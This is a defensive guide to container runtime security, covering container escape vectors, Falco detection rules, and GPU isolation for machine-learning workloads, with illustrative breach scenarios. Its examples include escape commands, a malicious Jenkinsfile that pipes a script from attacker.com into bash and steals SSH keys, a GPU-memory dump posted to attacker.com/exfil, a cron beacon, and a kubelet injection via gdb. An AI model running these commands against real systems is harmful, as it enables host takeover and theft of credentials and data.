Why running containers in production requires runtime monitoring, how container escapes work, securing AI/ML workloads with GPU isolation, and detecting breakouts before data exfiltration.
Container security doesn’t stop at image scanning and network isolation. Once containers are running, new attack vectors emerge: privileged mode exploitation, Docker socket abuse, kernel vulnerabilities, and specialized threats like AI model theft from GPU-accelerated containers.
In pharmaceutical production environments running machine learning workloads on AKS with GPU node pools, runtime security means protecting both infrastructure (preventing container escapes) and intellectual property (securing proprietary AI models worth millions in R&D investment). A container escape can expose the entire Kubernetes cluster. A poorly isolated GPU container can leak AI models to adjacent workloads.
This guide covers container runtime security across two critical domains: escape techniques attackers use to break out of containers, and specialized security for AI/ML workloads requiring GPU access.
Part 1: Container Escape Techniques
A container escape occurs when a process inside a container gains access to the host system. Attackers use container escapes to:
- Access other containers’ data
- Steal Kubernetes service account tokens
- Install persistent backdoors on the host
- Pivot to other nodes in the cluster
Escape Vector #1: Privileged Containers
Containers running with the --privileged flag have all Linux capabilities and direct access to host devices. This is functionally equivalent to root access on the underlying host.
How it works:
# Inside privileged container
mount /dev/sda1 /mnt
# Now have full access to host filesystem
cat /mnt/etc/shadow # Host password hashes
cat /mnt/root/.ssh/id_rsa # SSH keys
Real exploit (CVE-2019-5736):
A runc vulnerability allowed a malicious container to overwrite the host's runc binary via a file-descriptor leak through /proc/self/exe. The next time runc started or attached to a container, the attacker's code executed as root on the host.
Detection:
# Check if container is privileged
docker inspect <container> | grep '"Privileged": true'
# Kubernetes - check pod security context
kubectl get pod <pod> -o jsonpath='{.spec.containers[*].securityContext.privileged}'
Prevention:
- Never use --privileged in production
- If privileged mode is absolutely required, use Pod Security Standards to restrict it to specific namespaces
- Drop all capabilities by default, add only what’s needed
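In Kubernetes, the same prevention can be expressed in the pod's securityContext; a minimal sketch (the image name and the added capability are illustrative placeholders):

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: app
spec:
  containers:
    - name: app
      image: myapp:latest            # placeholder image
      securityContext:
        privileged: false            # explicit, even though it is the default
        allowPrivilegeEscalation: false
        capabilities:
          drop: ["ALL"]
          add: ["NET_BIND_SERVICE"]  # only if the app binds ports below 1024
```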
Escape Vector #2: Docker Socket Mounted
Mounting /var/run/docker.sock inside a container gives that container full control over the Docker daemon, including the ability to start new privileged containers.
How it works:
# Inside container with Docker socket mounted
docker run --privileged -v /:/host alpine chroot /host /bin/bash
# Now have root shell on host
Why this is common: CI/CD tools (Jenkins, GitLab Runner) often mount Docker socket to build images. This is a critical security risk.
Detection with Falco:
# Falco rule detecting Docker socket access
- rule: Docker Socket Access
  desc: Detect access to Docker socket from container
  condition: >
    open_write and container and
    fd.name=/var/run/docker.sock
  output: "Docker socket accessed (user=%user.name container=%container.name)"
  priority: CRITICAL
Safer alternatives:
- Kaniko: Build images without Docker daemon
- Buildah: Rootless container builds
- Docker-in-Docker (dind): Isolated Docker daemon per container (higher resource usage)
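As a concrete example of the Kaniko alternative in a GitLab Runner pipeline, a sketch of a build stage (registry variables follow GitLab's predefined CI variables; credential setup may differ in your environment):

```yaml
# .gitlab-ci.yml build stage using Kaniko - no Docker socket, no privileged mode
build:
  stage: build
  image:
    name: gcr.io/kaniko-project/executor:debug
    entrypoint: [""]
  script:
    - /kaniko/executor
      --dockerfile "${CI_PROJECT_DIR}/Dockerfile"
      --context "${CI_PROJECT_DIR}"
      --destination "${CI_REGISTRY_IMAGE}:${CI_COMMIT_SHORT_SHA}"
```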
Escape Vector #3: CAP_SYS_ADMIN Kernel Module Loading
Containers with CAP_SYS_ADMIN capability can load kernel modules, mount filesystems, and perform other privileged operations.
How it works:
# Inside container with CAP_SYS_ADMIN
insmod /tmp/rootkit.ko
# Malicious kernel module now running on host
CVE-2022-0847 (Dirty Pipe):
A flaw in the kernel's pipe buffer handling allowed unprivileged processes to overwrite data in read-only files. A container process could abuse it to overwrite host files visible inside the container, with no added capability required.
Detection:
# Falco rule detecting kernel module loading
- rule: Kernel Module Load
  desc: Detect kernel module loading from container
  condition: >
    evt.type in (init_module, finit_module) and container
  output: "Kernel module loaded from container (module=%proc.args container=%container.name)"
  priority: CRITICAL
Prevention:
# Drop CAP_SYS_ADMIN by dropping all capabilities
services:
  app:
    cap_drop:
      - ALL
    # Only add the specific capabilities needed via cap_add
Escape Vector #4: Host PID Namespace
Containers sharing host PID namespace can see and interact with host processes.
How it works:
# Run container with host PID namespace
docker run --pid=host alpine
# Inside container
ps aux # Can see ALL host processes
kill -9 <host-process-pid> # Can kill host processes
Why this is dangerous: Container can inject code into host processes, steal credentials from process memory, or cause denial of service.
Detection:
# Check if container uses host PID namespace
docker inspect <container> | grep '"PidMode": "host"'
Prevention:
- Never use --pid=host in production
- Kubernetes Pod Security Standards block this by default at "Baseline" level
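Pod Security Standards are enforced per namespace through labels; a sketch of a namespace that rejects hostPID (along with privileged mode and host networking) at the Baseline level:

```yaml
apiVersion: v1
kind: Namespace
metadata:
  name: production
  labels:
    pod-security.kubernetes.io/enforce: baseline
    pod-security.kubernetes.io/warn: restricted  # also surface violations of the stricter level
```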
Escape Vector #5: Exposed Host Filesystem Mounts
Mounting sensitive host directories gives containers direct access to host configuration, credentials, and data.
Dangerous mounts:
- /:/host – Entire host filesystem
- /etc:/host-etc – Host configuration (SSH keys, password hashes)
- /var/run:/var/run – Docker socket, other sensitive sockets
- /proc:/host-proc – Host process information
- /sys:/host-sys – Host kernel interfaces
Exploit example:
# Container with /etc mounted
docker run -v /etc:/host-etc alpine
# Inside container
cat /host-etc/shadow # Steal password hashes
cp /tmp/malicious-cron /host-etc/cron.d/backdoor # Install persistence
Detection with Falco:
# Falco rule detecting sensitive host mounts
- rule: Sensitive Host Mount
  desc: Detect container mounting sensitive host directories
  condition: >
    container and
    (fd.name startswith /host-etc or
     fd.name startswith /host-root or
     fd.name=/var/run/docker.sock)
  output: "Sensitive host directory accessed (path=%fd.name container=%container.name)"
  priority: WARNING
Prevention:
- Never mount sensitive host paths unless absolutely required
- Use read-only mounts when possible: -v /etc:/etc:ro
- Prefer copying files into the image over mounting at runtime
[IMAGE: Diagram showing 5 escape vectors with attack flow: Privileged → Host access, Docker socket → New privileged container, CAP_SYS_ADMIN → Kernel module, Host PID → Process injection, Host mounts → File access]
Runtime Security Monitoring with Falco
Falco detects runtime anomalies by monitoring syscalls, file access, network connections, and process execution.
Installing Falco (Kubernetes)
# Add Falco Helm repo
helm repo add falcosecurity https://falcosecurity.github.io/charts
helm repo update
# Install Falco with default rules
helm install falco falcosecurity/falco \
--namespace falco \
--create-namespace \
--set tty=true
Key Falco Rules for Container Escapes
# Detect shell spawned in container
- rule: Terminal Shell in Container
  desc: A shell was spawned in a container
  condition: >
    spawned_process and container and
    proc.name in (bash, sh, zsh)
  output: "Shell spawned in container (user=%user.name container=%container.name)"
  priority: WARNING

# Detect file writes in sensitive root-level paths
- rule: Write Below Root
  desc: Container writing below / or /root on the filesystem
  condition: >
    open_write and container and
    (fd.directory=/ or fd.name startswith /root)
  output: "File write in sensitive location (file=%fd.name container=%container.name)"
  priority: WARNING

# Detect privilege escalation
- rule: Set Setuid or Setgid Bit
  desc: Detect setting setuid/setgid bit
  condition: >
    evt.type in (chmod, fchmod, fchmodat) and
    (evt.arg.mode contains S_ISUID or evt.arg.mode contains S_ISGID)
  output: "Setuid/setgid bit set (file=%evt.arg.filename user=%user.name)"
  priority: CRITICAL
[IMAGE: Screenshot of Falco alert output showing container escape attempt detection]
Part 2: AI Model Container Security
AI/ML workloads introduce unique security challenges: GPU access requirements, model intellectual property protection, and multi-tenant GPU sharing risks.
The AI Model Security Problem
Pharmaceutical companies invest millions in AI model development:
- Drug discovery models trained on proprietary molecular datasets
- Clinical trial outcome prediction models
- Radiology image analysis models (FDA-approved medical devices)
If an attacker gains access to a container running inference, they can:
- Extract model weights: Reverse-engineer the model architecture and parameters
- Steal training data: Use model inversion attacks to reconstruct training samples
- Exfiltrate via GPU memory: Access GPU memory shared between containers
GPU Isolation Challenges
NVIDIA GPUs expose a single pool of device memory to every process running on the card. Without proper isolation:
- Container A can read GPU memory written by Container B
- Malicious container can dump entire GPU memory to find model weights
- Multi-Instance GPU (MIG) provides hardware isolation but not all GPUs support it
Securing GPU Workloads
1. Use NVIDIA MIG (Multi-Instance GPU):
# Enable MIG mode on A100 GPU
nvidia-smi -i 0 -mig 1
# Create seven 1g.5gb GPU instances (profile 19) with compute instances
nvidia-smi mig -cgi 19,19,19,19,19,19,19 -C
# Assign a MIG slice to a container
docker run --gpus '"device=0:0"' pytorch-model
MIG creates hardware-isolated GPU slices. Container A cannot access Container B’s GPU memory.
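With the NVIDIA device plugin or GPU Operator managing MIG, a Kubernetes pod requests an isolated slice by resource name instead of a whole GPU; a sketch (the profile resource name depends on how the card was partitioned, and the image is a placeholder):

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: ml-inference
spec:
  containers:
    - name: inference
      image: pytorch-model:latest    # placeholder image
      resources:
        limits:
          nvidia.com/mig-1g.5gb: 1   # one hardware-isolated MIG slice
```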
2. Encrypted Model Storage:
# Load encrypted model
import io
import os

import torch
from cryptography.fernet import Fernet

# Decrypt model in memory only
key = os.environ['MODEL_ENCRYPTION_KEY']  # From Kubernetes secret
cipher = Fernet(key)

with open('model.encrypted', 'rb') as f:
    encrypted_model = f.read()

model_bytes = cipher.decrypt(encrypted_model)
model = torch.load(io.BytesIO(model_bytes))
# Model never written to disk unencrypted
3. Restrict GPU Container Capabilities:
# docker-compose.yml for GPU workload
services:
  ml-inference:
    image: pytorch-gpu:latest
    runtime: nvidia
    environment:
      - NVIDIA_VISIBLE_DEVICES=0
    cap_drop:
      - ALL
    cap_add:
      - CHOWN  # Only if needed for file permissions
    read_only: true
    tmpfs:
      - /tmp
    security_opt:
      - no-new-privileges:true
      - apparmor=docker-default
4. Monitor GPU Memory Access:
# Monitor GPU memory usage
nvidia-smi dmon -s um -c 1
# Detect unusual memory patterns
# Sudden spikes may indicate memory dumping attacks
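The dmon output above can also be polled programmatically. A minimal Python sketch, assuming nvidia-smi is on the PATH; the threshold and interval are illustrative, and the parser is separated out so it can be tested without a GPU:

```python
import subprocess
import time


def parse_used_mib(csv_output: str) -> list[int]:
    """Parse `nvidia-smi --query-gpu=memory.used --format=csv,noheader,nounits`
    output into per-GPU used-memory values in MiB."""
    return [int(line.strip()) for line in csv_output.splitlines() if line.strip()]


def watch_gpu_memory(threshold_mib: int = 14000, interval_s: int = 10) -> None:
    """Alert when any GPU's used memory exceeds the threshold; a sudden
    spike toward full capacity can indicate a memory-dumping attempt."""
    while True:
        out = subprocess.run(
            ["nvidia-smi", "--query-gpu=memory.used",
             "--format=csv,noheader,nounits"],
            capture_output=True, text=True, check=True,
        ).stdout
        for gpu_idx, used in enumerate(parse_used_mib(out)):
            if used > threshold_mib:
                print(f"ALERT: GPU {gpu_idx} using {used} MiB (> {threshold_mib})")
        time.sleep(interval_s)
```

In production you would forward these alerts to your SIEM rather than print them; the point is that baseline-deviation monitoring of GPU memory is scriptable with nothing beyond nvidia-smi.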
[IMAGE: Diagram showing GPU isolation: Without MIG (shared memory, cross-container access) vs. With MIG (hardware partitions, isolated memory)]
Production Failure Scenarios
Scenario 1: CI/CD Container Escape via Docker Socket
The Setup: A pharmaceutical company’s Jenkins CI/CD pipeline ran inside Kubernetes. To build Docker images, Jenkins pods mounted the host’s Docker socket.
The Failure: A developer’s compromised credentials allowed attackers to submit a malicious Jenkins job:
// Malicious Jenkinsfile
node {
    sh '''
    docker run --privileged -v /:/host alpine sh -c "
      chroot /host /bin/bash -c '
        curl http://attacker.com/backdoor.sh | bash
        cp /root/.ssh/id_rsa /tmp/stolen_key
      '
    "
    '''
}
Because Jenkins pod had Docker socket access, the malicious job:
- Started a privileged container
- Mounted entire host filesystem
- Installed persistent backdoor
- Stole SSH keys from all Kubernetes nodes
Attackers gained cluster-wide access, exfiltrated kubeconfig files, and accessed all application secrets.
What Should Have Been Done: Use Kaniko for image builds (no Docker socket required):
# Kubernetes pod using Kaniko
apiVersion: v1
kind: Pod
metadata:
  name: kaniko-build
spec:
  containers:
    - name: kaniko
      image: gcr.io/kaniko-project/executor:latest
      args:
        - "--dockerfile=Dockerfile"
        - "--context=git://github.com/user/repo"
        - "--destination=myregistry/image:tag"
  # NO Docker socket mount
Impact: Complete Kubernetes cluster compromise, 8 nodes, 200+ production workloads accessed, patient data exposure investigation (no exfiltration confirmed), $1.8M incident response, CISO replacement.
Key Lesson: Mounting the Docker socket is functionally equivalent to giving root SSH access. Use rootless build tools like Kaniko or Buildah.
Scenario 2: AI Model Theft via GPU Memory Dumping
The Setup: A biotech company ran drug discovery AI models on Kubernetes with NVIDIA T4 GPUs (no MIG support). Multiple research teams shared GPU nodes.
The Failure: A contractor with legitimate access deployed a malicious container that dumped GPU memory:
# Malicious container code (simplified illustration; real attacks use
# lower-level CUDA APIs to sweep device memory for residual data)
import requests
import torch

device = torch.device('cuda')

# Grab large uninitialized GPU allocations; without MIG, freshly
# allocated device memory can contain residual data from other
# containers' workloads on the same GPU
gpu_memory_dump = []
for _ in range(16):  # sweep ~16 GB (T4) in 1 GB chunks
    try:
        chunk = torch.empty(1_000_000_000 // 4, dtype=torch.float32, device=device)
        gpu_memory_dump.append(chunk.cpu().numpy().tobytes())
    except RuntimeError:
        break  # GPU memory exhausted

# Exfiltrate to external server
requests.post('http://attacker.com/exfil', files={'dump': b''.join(gpu_memory_dump)})
GPU memory contained:
- Model weights from adjacent team’s FDA-submitted AI medical device
- Proprietary molecular structure embeddings
- Training data samples (patient X-rays – HIPAA violation)
What Should Have Been Done:
- Use MIG-capable GPUs: A100 instead of T4 for multi-tenant workloads
- Dedicated GPU nodes per team: Node taints/tolerations to prevent co-location
- Model encryption: Encrypt model weights, decrypt only in GPU memory during inference
# Kubernetes - dedicated GPU node pool per team
apiVersion: v1
kind: Node
metadata:
  labels:
    team: drug-discovery
    gpu: nvidia-a100-mig
spec:
  taints:
    - key: dedicated
      value: drug-discovery
      effect: NoSchedule
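Pods from the team then land on those nodes via a matching toleration and node selector; a sketch reusing the labels and taint above (the image name is a placeholder):

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: discovery-training
spec:
  nodeSelector:
    team: drug-discovery
  tolerations:
    - key: dedicated
      operator: Equal
      value: drug-discovery
      effect: NoSchedule
  containers:
    - name: training
      image: drug-discovery-model:latest  # placeholder image
```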
Impact: $4.2M model theft (competitor filed similar patent 6 months later), HIPAA breach (training data in GPU memory), FDA review of AI device security, loss of competitive advantage.
Scenario 3: Privileged Container Kernel Module Backdoor
The Setup: A fintech platform ran network monitoring containers in privileged mode to access raw network interfaces.
The Failure: Application vulnerability allowed RCE in monitoring container. Attacker exploited privileged mode to load kernel rootkit:
# Inside privileged monitoring container
insmod /tmp/diamorphine.ko
# Kernel rootkit installed - hides processes, network connections, files
Rootkit provided:
- Hidden processes (invisible to ps, top, Kubernetes metrics)
- Hidden network connections (backdoor port not visible to netstat)
- Hidden files (exfiltrated data not shown in du, ls)
Attackers maintained access for 87 days undetected.
What Should Have Been Done:
- Drop privileged mode: Use CAP_NET_RAW + CAP_NET_ADMIN instead
- Enable Falco: Detect kernel module loading
- Kernel lockdown mode: Prevent runtime module loading
# Secure network monitoring container
services:
  network-monitor:
    image: network-monitor:latest
    cap_drop:
      - ALL
    cap_add:
      - NET_RAW    # Packet capture
      - NET_ADMIN  # Network configuration
    # NOT privileged
Impact: 87 days of undetected access, complete network traffic capture (TLS certificates, API keys, customer PII), SOC 2 audit failure, $2.1M forensic analysis, customer breach notifications.
Key Lesson: Privileged mode should never be used. CAP_NET_RAW + CAP_NET_ADMIN provide network access without kernel module loading capability.
Scenario 4: Host PID Namespace Process Injection
The Setup: A SaaS platform ran debugging sidecars with --pid=host to troubleshoot customer application crashes.
The Failure: Customer uploaded malicious code that gained access to debugging sidecar. With host PID namespace:
# Inside container with --pid=host
ps aux | grep kubelet
# Find kubelet PID: 1234
# Inject into kubelet process
gdb -p 1234
(gdb) call dlopen("/tmp/malicious.so", 2)
# Malicious library now running inside kubelet
Injected code into kubelet process:
- Intercepted all pod creation requests
- Stole Kubernetes secrets from environment variables
- Exfiltrated service account tokens
What Should Have Been Done: Never use --pid=host. Use kubectl debug instead:
# Kubernetes ephemeral debugging container (isolated PID namespace)
kubectl debug <pod> -it --image=busybox --target=<container>
Impact: Kubernetes cluster compromise, access to all namespaces, 40+ customer environments accessed, class-action lawsuit, $3.4M settlement, platform architecture redesign.
Scenario 5: Escape via /proc/self Exploitation
The Setup: A healthcare platform ran containers without AppArmor enforcement. A kernel vulnerability (CVE-2022-0847, Dirty Pipe) allowed unprivileged processes to overwrite data in read-only files by abusing the kernel's pipe buffer handling.
The Failure: An attacker exploited a path traversal vulnerability to gain code execution in a container, then used Dirty Pipe to overwrite the host's cron configuration:
# Inside container (no AppArmor, host path mounted)
# Dirty Pipe exploit overwrites the page cache of a read-only file:
#   /host-mounted-path/../../../etc/cron.d/backdoor
# Host cron now runs attacker's code every minute
* * * * * root curl http://attacker.com/beacon
What Should Have Been Done: Enable AppArmor with Docker’s default profile:
services:
  app:
    security_opt:
      - apparmor=docker-default
      - no-new-privileges:true
Docker's default AppArmor profile denies writes to sensitive /proc and /sys entries and blocks many of the kernel interfaces abused in container escapes; kernel patching remains the definitive fix for bugs like Dirty Pipe, but mandatory access control shrinks the attack surface an exploit can reach.
Impact: HIPAA breach (192,000 patient records), HHS OCR investigation, $2.3M fine, mandatory AppArmor enforcement across all workloads, complete infrastructure audit.
[IMAGE: Attack timeline diagram for each scenario showing: Initial compromise → Escape technique → Lateral movement → Exfiltration → Detection (or lack thereof)]
Defense in Depth for Runtime Security
Layer 1: Prevent Escapes
- Never use --privileged
- Drop all capabilities, add only what's needed
- Enable AppArmor/SELinux
- Use read-only root filesystems
- Avoid Docker socket mounts
- Never use host PID/IPC/network namespaces
Layer 2: Detect Anomalies
- Deploy Falco for runtime monitoring
- Monitor syscalls, file access, network connections
- Alert on shell spawns in production containers
- Detect kernel module loading attempts
- Log all privilege escalation attempts
Layer 3: Limit Blast Radius
- Network segmentation (isolate tiers)
- Secrets rotation (limit token lifetime)
- Pod Security Standards (enforce at namespace level)
- RBAC (least privilege for service accounts)
- Audit logging (immutable logs for forensics)
Layer 4: AI/ML Specific
- Use MIG for GPU isolation
- Encrypt model weights at rest and in transit
- Dedicated GPU nodes per team/project
- Monitor GPU memory access patterns
- Implement model watermarking (detect theft)
Key Takeaways
- Container escapes exploit privileged mode, Docker socket access, capabilities, and kernel vulnerabilities
- Falco provides runtime threat detection by monitoring syscalls and detecting anomalous behavior
- Docker socket mounting is equivalent to root access—use Kaniko, Buildah, or isolated dind instead
- CAP_SYS_ADMIN enables kernel module loading—never grant this capability in production
- AppArmor and SELinux block entire classes of escapes by restricting kernel interface access
- AI/ML workloads require GPU isolation—use NVIDIA MIG or dedicated nodes to prevent model theft
- Model encryption protects IP even if container is compromised—decrypt only in GPU memory
- Defense in depth combines prevention, detection, and blast radius limitation
Runtime security is where theoretical threats become real incidents. Image scanning finds vulnerabilities in packages. Network policies restrict traffic. But runtime monitoring detects when an attacker is actively exploiting a vulnerability, attempting to escape, or exfiltrating data. For AI/ML workloads worth millions in R&D investment, specialized GPU isolation and model encryption are not optional—they’re mandatory protection for intellectual property.
Previous: Network Isolation & Segmentation for Multi-Tier Architectures
Next: Production Docker Debugging Handbook
Hands-on labs:
- Lab 06: AI Model Container Security — Secure GPU workloads, implement MIG isolation, encrypt models
- Lab 09: Container Runtime Escape Prevention — Practice escape techniques, deploy Falco, test detection